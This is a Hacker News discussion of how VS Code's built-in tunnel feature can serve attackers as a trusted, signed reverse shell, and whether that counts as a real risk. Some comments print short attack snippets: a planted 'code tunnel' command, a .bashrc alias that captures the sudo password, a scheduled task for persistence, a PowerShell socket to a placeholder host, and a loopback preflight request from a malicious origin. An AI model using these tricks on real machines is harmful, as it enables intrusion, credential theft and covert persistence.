Blocking Visual Studio Code embedded reverse shell before it's too late (ipfyx.fr)
310 points by GavinAnderegg on Sept 23, 2023 | 83 comments



> this tunnel can be triggered from the cmdline with the portable version of code.exe. An attacker just has to upload the binary

If the attacker can run commands and upload binaries, it really doesn't matter what VS Code does. There are lots of commands and binaries that can open network connections.

Edit: The attacker apparently needs to control the URL and exfiltrate the activation code [0], so if they can already execute commands and open network connections, then this enables them to execute commands and open network connections. So, as mentioned by other commenters, this does sound a lot like Raymond Chen's airtight hatchway [1].

[0] https://badoption.eu/blog/2023/01/31/code_c2.html

[1] https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31...


I think there is a difference in degree.

There is some likelihood that VS Code may already be installed (depending on who the attacker wants to target), so the victim "just" has to be tricked into running a single shell command - and the attacker immediately gets live shell access, without having to worry about firewalls, connectivity, finding the victim's address, etc.

So I think the danger of this is less that it's technically an RCE exploit (as indeed you already need an existing way to run code to trigger it) - but rather that it lets an attacker turn a relatively simple capability (planting a single shell command with no back channel that the victim might run at some point in the future) into a sophisticated one (having access to a full remote shell with all the bells and whistles, including firewall traversal, automatic reconnect and file transfer).
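
For concreteness, the kind of planted one-liner meant here could be as small as this (a sketch; the flag is recalled from the VS Code CLI and may differ by version):

  # hypothetical one-liner an attacker plants; "code" is the stock VS Code CLI
  code tunnel --accept-server-license-terms

On first run it prints a one-time device-login URL and code to be completed against a GitHub/Microsoft account - which is the back channel mentioned in the edit below.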

Edit: ok, looks like the attacker already needs a back channel to get hold of the access code for the tunnel.


You've misunderstood the situation completely. The first job of a persistent attacker is to gain access. The second job of a persistent attacker is to pivot that access from illegitimate to legitimate, so that by the time their TTPs become IOCs, log rotation has wiped the illegitimate access from the books and all their access looks legitimate.

What we have here is a way for an attacker using shady means (email-delivered 0-day, parking-lot thumbdrive, browser drive-by compromise) to take over a computer and then drop a signed package that allows remote control over time and looks completely legitimate. To a network IDS, that access will look like an authorized cloud tunnel, completely normal. To a file scanner, it will look like a vendor-signed binary, the gold standard. To the complete defense-in-depth stack, the entire C2 chain is cloaked in legitimacy. If you get a single detection at all for the initial compromise (not possible with a 0-day), the entire rest of the kill chain looks like legitimate access and vanishes.

It's a nightmare for defense in depth and hunt teams.


Thanks for the explanation, that makes a lot more sense actually.


ssh.exe seems to be on enough Windows machines these days. How's that different?


ssh.exe would at least show up on the firewall as "ssh connecting to a dubious host". The VSCode thing would show up as "VSCode connecting to some random Microsoft domain".


Yeah, sorry, but if you are in an environment where you are actively monitoring your firewall and you didn't notice that your machine was breached, you have far bigger problems than VS Code or an SSH process.


How do you find out that your machine (or one of the many you are observing) was breached, if the attacker is not doing obvious damage? I think monitoring connections is the standard procedure to find this out?


If someone can physically access your machines, log in, plug in a USB stick or download malware, no amount of log monitoring will keep your data safe.


The question is not to keep your data safe, but to know that there is a breach to begin with.


If a user is logged in with high activity at a time the user should not be working, and the only thing that would tip you off is your firewall log, you have other problems than a remote access feature of VS Code that "could" be abused ONLY if the attacker had previously breached your system.


And if the attacker is smart and uses active times to hide his activity, then monitoring active connections is still a smart approach, no?


It's nice to have especially if you need to find a rogue employee but if you catch a bad actor only when he is already exfiltrating, you failed at your job.


Sure, but when some damage is already done, you can and must still prevent greater damage. And you have to assume that one day something will fail. So - "monitoring active connections is a smart way, no?"


powershell.exe is on all of them. Just load up System.Net.TcpListener/Client and Bob's your uncle.
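
A minimal sketch of what that means (hypothetical host and port; this just opens an outbound socket from stock PowerShell, nothing more):

  REM hypothetical host; opens an outbound TCP socket, nothing VS Code specific
  powershell -NoProfile -Command "New-Object System.Net.Sockets.TcpClient -ArgumentList 'host.example',443"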


Running arbitrary PowerShell scripts from disk during OS autostart is one of the (if not the) loudest things an attacker could do. The point of this blog post is stealth. Nobody claims it's a vulnerability in VS Code (or a vulnerability in anything at all), just a convenient method of persistence.


And then for the attacker to do anything damaging to the computer they need to trick you into revealing your sudo/admin password, right?

On a default Unix-like desktop shell you can’t really do much permanent harm without elevating your permissions.


Write access to .bashrc is plenty to very sneakily get sudo access, though.

  alias sudo='./.my-evil-sudo-binary'
And wait till the next time the user authenticates; they won't see anything amiss, and you just silently delete the alias after you've got the sudo password.

Also, even without root, dumping .ssh and the browser's cookie jar is probably plenty to achieve lateral movement.


Indeed. This whole post is a nothingburger since the "attack" requires the attacker to already be on the wrong side of the airtight hatchway.


The "airtight hatchway" argument is that it's not a security bug in the program. I don't think TFA makes the case that it is a security bug, so it's moot.

Personally I'm not particularly moved by the lolbin and footgun case it does make. I am just mildly put off by how text editors and IDEs are inextricably bundled with so many double-edged remote capabilities.


This. I'd be more worried about some worker deliberately opening up a piece of internal infrastructure to make their work life easier than about an attacker taking advantage of the binary being trusted.


They are nowadays competing with cloud services for users. Increasingly, being able to manipulate data on a machine other than the one I'm currently physically sitting at is a table-stakes feature.


Isn't the whole "airtight hatchway" concept mostly invalidated today by "defense in depth" and "zero-trust networking" paradigms? Effectively, the airtight hatchway often isn't, so you do have to think about cases where the attacker is behind it.

E.g., it used to be an effective security measure to have a daemon listen on loopback only. But then browsers relaxed the same-origin policy and today every sleazy banner ad can get the browser to open a TCP connection on loopback and at least send a TLS handshake - and, if the daemon accepts that, an OPTIONS request with an attacker-controlled URL. So a daemon has to perform at least some basic validation on incoming connections to be secure.
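
As a rough illustration (the port, path and origin here are made up), this is the kind of preflight a loopback daemon can receive courtesy of any page the user happens to have open:

  # hypothetical local daemon on 127.0.0.1:8080; any web page can trigger this preflight
  curl -i -X OPTIONS http://127.0.0.1:8080/api/update \
      -H 'Origin: https://sleazy-ad.example' \
      -H 'Access-Control-Request-Method: POST'

If the daemon answers permissively (or treats "it came from loopback" as proof of a trusted caller), the follow-up request goes through, which is why checking at least the Origin/Host headers is the minimum validation meant above.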


Zero-trust networking still involves threat models and things which you are and aren't trying to defend against. The "airtight hatchway" concept is just that once you've declared that a certain type of attack isn't something you're trying to prevent, there's no point in reporting issues which rely on that attack because it's already known to be vulnerable. Defense in depth can be seen as adding multiple hatchways, but there's still always going to be something inside the innermost one.

If your threat model involves people trying to exfiltrate data from a developer machine with an internet connection in an innocent-looking way, this VSC feature is a problem. Most companies either don't make an attempt at preventing that, or would use an airgapped setup so it's not something worth caring about.


> Defense in depth can be seen as adding multiple hatchways, but there's still always going to be something inside the innermost one.

And even if you're not in the innermost area, an attack might exist entirely in the space between two hatchways and not breach any.


Isn't this validly described as "it lets you execute commands as a particular user on a particular host, but requires you to first execute a command as that user on that host"? Even in "defense in depth" or "zero-trust networking" paradigms, what does this ever let attackers do that they couldn't do already?


Unfortunately, differentiating good behavior from malicious behavior is a central pillar of security, and the existence of this feature undermines that pillar.

* The fact that it's in a popular signed binary means it bypasses app allow-lists.

* The fact that it flows through Microsoft's servers bypasses firewall allow-lists.

* The fact that no stage2 is required bypasses antivirus scanning.

I say "unfortunately" because I personally think attempting to differentiate good behavior from malicious behavior is losing battle. Design-based or resilience-based security controls are the way to go IMO: https://kellyshortridge.com/blog/posts/control-vs-resilience...


Looking at it from a risk management perspective there’s more nuance.

There are lots of ways to tunnel, but one that looks legitimate (and may actually be) is a great one. This is a great way to have a long-term, persistent exfiltration mechanism. Compromise some desktops, move laterally through the network, and you have a river of data flowing out.


Here's the "airtight hatch" article folks are referring to:

https://devblogs.microsoft.com/oldnewthing/20060508-22/?p=31...

Phishing does involve an insider being confused and letting someone in, though. The question is what a vscode user could be tricked into doing. That part of the explanation could be fleshed out more?

I'm also reminded of how browsers do defense in depth. The "airtight hatch" argument implies that second-level security is worthless because the first level is secure. Having a useful binary already there on the system might be useful for chaining with another exploit?

But that assumes a developer environment can be made into a low-privilege container, sort of like a browser's render process. I don't think many people work that way?

Perhaps someday we will work in containers and code editors will be locked down like browsers. The most straightforward path to that would probably be for the code editor to run in the browser.

That's something VS Code can do, so a policy that says you must use a browser-based version of VS Code might actually work for some organizations?


The "airtight hatch" story is not fully applicable here. Executing VScode instead of a random exploit payload could be considered an increase in privilege, because you're going from an unsigned and unknown binary to one that is signed by Microsoft. And VScode is probably allowed through any outgoing firewall rules because the main user of the machine is using it, while a random exploit payload would not be.


The vast, vast majority of users will neither want nor use this embedded reverse shell functionality. I fall in that majority. Hats off to the users who do use it to get their work done, but I/we don't.

So for us, this function should have an enable flag which is off by default. The slim minority who do want it and would use it can suffer the inordinate burden of having to go into the preferences panel and click enable.

You can argue whether it is a hole (it is) or whether it is a piece of a hole (it is). But it should be off by default and on by permission.

Yo Microsoft, add a preference for this thing which defaults off.


It is not enabled by default? You need to log in with a GitHub or Microsoft account, install the remote dev extension, and then explicitly enable the feature on a per-machine basis (and yes, this can be done via the CLI, as the article mentions).

If you don’t know the feature set of the software you use, maybe don’t use the software instead of blaming the vendor.


1. You don't need to install any extension; `code tunnel` is built in, and the extension is just UI on top of the tunnel. No extension is needed to open a reverse shell.

2. It's about an attacker exploiting the feature; the attacker is the one enabling it and doing the login. Whether you need to enable it yourself is largely irrelevant - in fact, you're probably more likely to notice an ongoing attack if you use the feature yourself.

Anyway, the default is beside the point; a gadget is a gadget as long as the bits are there and easily executable.


But I shouldn't need to know this feature exists in order to use this editor. Apparently Auto Closing Overtype deserves an enable/disable/auto flag but Embedded Reverse Shell doesn't.

Yo Microsoft, add a preference for this thing which defaults off.


> If you don’t know the feature set of the software you use, maybe don’t use the software instead of blaming the vendor.

Saying this in reference to modern Microsoft, with their default-opt-in-to-drive-market-share strategy, is a pretty high bar.

Effectively it means "Don't use Windows."


So if someone already has physical access to a machine they can get remote access to the machine? Even ignoring the fact that they already had access, they sell devices that emulate a keyboard/mouse/monitor that can already do this undetectably.


I think there’s an interesting argument to be made about reducing the attack surface area for userspace though. A really naive thing to do would be to run any shell (any program really) in its own isolated environment. The barriers to this aren’t really technical IMO, mostly they are UX barriers. It needs good OS support, and there’s not really a developer oriented OS with smooth mechanisms for escalating and de-escalating privileges at a granular level (sudo ain’t it lol).

An ideal development environment would: (1) allow for executing unsigned/self-signed code without jumping through hoops or relying on a 3rd party or App Store, (2) allow for escalation and automatic de-escalation of fine-grained privileges with native UX for grants (Little Snitch on macOS has a good design for this specifically for networking IMO; one could imagine extending this to the file system).

There are plenty of systems that have some aspects of these, but I have not seen both, at least not in a form accessible enough to be ubiquitous in 2023.


Or someone with physical access for five minutes can set themselves up with a lifetime subscription to whatever you may have that's worth stealing on that machine in the future, without installing anything that can be detected as malware.


Code execution leads to code execution. CVE score 9.98 confirmed by Mitre


> The worst part is that this tunnel can be triggered from the cmdline with the portable version of code.exe. An attacker just has to upload the binary, which won't be detected by any anti-virus since it is a legitimate and signed windows binary.

This feels like Raymond Chen’s other side of the airtight hatch.

Yes, if you can get a binary you control onto the user’s system and get them to run it, you can use that to have remote code execution. But then, the whole exploit described is remote code execution.


VS Code functions as a remote access trojan (RAT) in this scenario. But while your AV will hopefully detect and flag most common RATs, it won't flag VS Code. This method is often used in real-world attacks (especially targeted ones).

I'm not saying that's a huge concern, but something one has to consider when protecting their organisation.


But how did you put the binary on the box and run it without an already working RCE/RAT?


I think it's a point about persistence. It's easy to obfuscate an existing piece of malware so it's not found for a day or two, harder to keep it undetected forever. If you instead create a scheduled task that runs code.exe to expose some internal network port, you can keep it for as long as the machine lives.
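
As a sketch of what that persistence could look like on Windows (task name and path are made up; the flags are standard schtasks ones):

  REM hypothetical scheduled task that quietly re-establishes the tunnel at every logon
  schtasks /create /tn "OfficeSync" /sc onlogon /tr "C:\tools\code.exe tunnel --accept-server-license-terms"

To anyone glancing at the task list or the process tree, that's just VS Code phoning home to Microsoft.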

But that's already assuming you get compromised anyway, and that your compromised workstations have things worth reaching on their internal network/VPN. All things that are true on real corporate networks, but "fixing" this vulnerability is still pretty low impact in the grand scheme of things one could do to improve the situation. But in my experience, most CISOs aren't that great at setting priorities and threat modeling anyway: one just recently told me they don't want XSS vulnerabilities reported, because the scanner would find them anyway - but sends out daily all-caps emails about specific emails being phishing.


The industry is pretty bad at blocking RCEs (0-days are just inevitable, and preventing 1-days or plain stolen credentials is IMO equally hard). The industry is better at detecting compromise by spotting post-exploitation behaviors such as reverse shells or exfiltration of large amounts of data.

Your developer uses VSCode and sends a lot of data to vscode.dev or another Microsoft domain? Sounds totally normal, nothing suspicious here, move on!


> internal network is now accessible from anywhere !

If you exposed it willingly.


The point of the blog post is that this method is useful for attackers (as a so-called lolbin - trusted binary used in a malicious way).


I work with 500 idiots. Willingly and cluelessly are interchangeable.


Not nicely put, but not wrong. I had half a heart attack when that feature was rolled out, and the danger was split only between myself and a colleague. I can't even trust myself not to screw up. I needed yet another permanent invocation of the principle of hope.


The industry is only going to keep making more idiots if they treat developers like this.


It kept producing more idiots when we didn't treat them like this and this is easier so fuck it.


Take their computer away.


Seems to be the goal of most "cybersecurity" types.


I thought their goal was collecting vendor certifications.


Ouch dude


It's a burn, but it's accurate. Had three consultancies in (high-end, well-known ones) and two in-house, certified-to-their-eyeballs professional cyber security experts in charge. All they did was tick a fuck load of boxes, run some scans, spend a lot of money and make it really hard for people.

Yet I managed to find a fully remote RCE and exploit it in 30 minutes after they did all this.

The industry is a fucking scam.


Confirming this experience, it is Security Theatre all the way down.


Sounds like it's time to make your own certification. :D


Management frowned at this suggestion.


Well said, this is why working solo can be beneficial: only one idiot to look out for. :)


That’s the idiot that can do the most damage!


Can confirm.


This can be particularly pernicious since, in order to collaborate, someone may do this and not consider the security ramifications.


If I enter your house through the front door and unlatch the patio door from the inside, I can then enter the house through the patio door.


I am so glad that my users now have the ability to expose their computer with highly sensitive data right on the web, through an authentication flow I neither control nor supervise.

Perhaps you shouldn't treat your users like stupid cattle, or you're not going to get anything better out of them, only worse.


It's about preventing mistakes and everybody makes those. If your company or institution is a target for spies, you want to avoid anything that makes it easy for an attacker.


You know, sometimes people cut themselves very badly with sharp knives.

I'd like you to give me all your kitchen knives. If you need to cook a steak or something, you can just give me a call and I will supervise you while you use the knife.

I wouldn't want you to make a mistake and make it too easy to injure yourself.


In medicine, this is called an autoimmune disease. In social sciences, this is called paranoia. The latter is about as helpful to an organization as the former is to a human body.


This is the obvious next step for the industry/technology. I think a better answer is to maximally reduce the potential fallout from a compromised employee.

This is easier said than done, and if you go in the direction of complicated procedures, employees will usually just try to bypass them entirely.

However, I think there is a middle ground or a sweet spot here. The tech has come a long way in the past decade or so. It's pretty easy to have a setup where almost no employee can deploy to production from their local machine.

It's also the easiest it's ever been to have a sandboxed production environment and a near-parallel staging environment.


Stepping back for a second...do we have evidence that these sorts of issues are actually the cause of a significant number of breaches rather than paranoia on the part of people that are paid to be paranoid?

That's not a rhetorical question, I'm actually curious to find out. The reason I ask is that of all the big security breaches that end up in the news, I cannot recall a single case where these sorts of issues (for instance, not locking down deployment to production) were the root cause.


Is this already blocked by default in most corporate environments?

It seems this opens up an easy way to exfiltrate corporate data (without detection?)

Correct me if I am wrong, please:

An attacker (or a cooperating employee) can browse and download any files from the target machine inside the corporate network by opening the generated vscode.dev/tunnel URL from a browser on any device anywhere in the world?


Yep. A place I worked forked VSCode as its recommended IDE. VSCode can prevent installation of all but allowlisted extensions by policy. They used an extensive review process for third-party extensions because some components need to run remotely in the development environment rather than on the local machine with the VSCode UI.

Random thought: Since there are N editors and M languages, that's N x M plugins. Surely there's a better way to reduce the effort involved.


> Random thought: Since there are N editors and M languages, that's N x M plugins. Surely there's a better way to reduce the effort involved.

Yeah, it's called LSP. The core of most plugins is just an LSP server that's shared between vim, neovim, emacs, vscode, sublime, etc. All the editor needs is to support LSP generically, or to have a generic LSP plugin like vim/emacs do.

For example, if you look at neovim, you just load the actual LSP server and wire it up to the editor in Lua. That's more or less the majority of the "extension code" for something like sublime or vscode (plus some other niceties).


You're making a dishonest leap here. Language server protocol doesn't create a universal plugin.


What do you mean by a universal plugin?


LSP doesn't automatically add all possible language support features to all editors via a common API without any extra effort. It gives things like code completion, syntax checking, and refactoring help, but these are only some of the pieces of language support that each editor must provide, rather than a complete solution.


> VSCode can prevent installation of all but allowlisted extensions by policy.

Companies using that are probably the reason for, or at least a big motivator for, the feature in question. Lots of developer creativity is spent on working around corporate "security" practices that otherwise prevent work from being done.


How well would it work to allow every plugin to be used on confidential and protected systems without any sort of review? There's no way to denylist your way out of a keylogger or a malicious look-alike plugin retroactively. I think you're painting with a broad brush, lacking nuance or an understanding of the concerns involved.


I'm painting with a broad brush indeed, as all my nuance has been lost dealing with bullshit like being able to 5x my coding speed by (ab)using my "local admin" rights to discover which magic folders are on the Windows Defender exclusions list, hardcoded by corporate policy, and moving all my stuff there, while seeing requests to kindly just allow us to add our stuff to exclusions locally rejected with responses like "nope, and surely we can resolve the slowdown this causes by reimbursing you for a cooling pad for your laptop".


Well, that's all well and good. You have to deal with the possible and the permitted rather than complain about how you would do things your way. It's not your company and not your risk. Any time you break legitimate security rules you're putting your job and the jobs of everyone else at risk should there be a massive breach.

No one in corporate uses WD because it's unmanaged. OTOH, MDE P1+VM is a steaming pile of shit that arbitrarily deletes things on untold millions of end-user devices because Microsoft doesn't do proper risk management (canarying) for new definitions.


Why is this not an extension?

I cannot think of a single argument for this being default functionality.


Is this more or less of a vulnerability than VS Code's Live Share? https://code.visualstudio.com/learn/collaboration/live-share


No, it's an intentional ngrok-like tunneling feature.


This is very poorly written.



